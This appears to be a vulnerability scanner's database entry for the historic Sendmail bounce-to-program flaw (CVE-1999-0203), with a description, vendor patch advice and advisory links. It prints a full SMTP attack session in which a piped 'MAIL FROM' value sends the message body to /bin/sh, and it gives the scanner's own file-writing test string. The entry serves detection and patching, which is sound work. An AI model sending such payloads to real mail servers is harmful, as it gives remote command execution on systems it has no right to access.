| VID |
18017 |
| Severity |
40 |
| Port |
25 |
| Protocol |
TCP |
| Class |
SMTP |
| Detailed Description |
The Sendmail server allows to mail to bound to a program.
In Sendmail, server may accept the improper "MAIL FROM" address included a pipe("|") character.
This probably means that it is possible to send mail that will be bounced to a program, which is
a serious threat, since this allows a remote attacker to execute arbitrary commands on this host.
Using this vulnerability, a remote attackers would send mail for an actual attack as the follow :
>> telnet [target address] 25
HELO domain.com
MAIL FROM: |/bin/sed '1,/^$/d'|bin/sh
RCPT TO: nosuchuser
DATA
hello!!
my name is test program....
ping test.com
Quit
>>
It would make the mail bounce and go back to the sender, which would then pass it through the pipe and execute the body of the message(ping test.com).
Note: This check try to test this vulnerability using "MAIL FROM: |/bin/id>by_scanner.bouncetoprogram.vulnerability". It might be a "False Positive", since some MTAs such as Smail and the IRIX 6.x sendmail will not complain to this test, but instead just drop the message silently. This scanner attempts to create a file called 'by_scanner.bouncetoprogram.vulnerability' in /tmp directory. If this file exists on the specified host after the scan is complete, then the host is vulnerable.
* References:
http://www.cert.org/advisories/CA-1995-08.html
ftp://ciac.llnl.gov/pub/ciac/bulletin/e-fy94/e-03.ciac-unix-sendmail-vulns |
| Recommendation |
Upgrade to the latest version of Sendmail or Apply the appropriate patch for your system, available from the Sendmail site : ftp://ftp.sendmail.org/pub/sendmail/
* Eric Allman :
Upgrade to the Sendmail 8.6.12
ftp://ftp.cert.org/pub/tools/sendmail/sendmail.8.6.12
* Berkeley Software Design, Inc.(BSDI) :
Upgrade to the BSD/OS V2.0.1 or install the patch U200-011 for BSD/OS V2.0 users
ftp://ftp.bsdi.com/bsdi/patches/U200-011
* Sun Microsystems, Inc.
Install the patch for Sun OS 4.1.3, 4.1.37_u1, and 4.1.4 users
ftp://ftp.uu.net/systems/sun/sun-dist/
* Silicon Graphics Inc.
Upgrade to the Sendmail 8.6.12 or install the patch
ftp://ftp.sgi.com
You can refer to the follow reference site for the detailed information.
http://www.cert.org/advisories/CA-1995-08.html |
| Related URL |
CVE-1999-0203 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
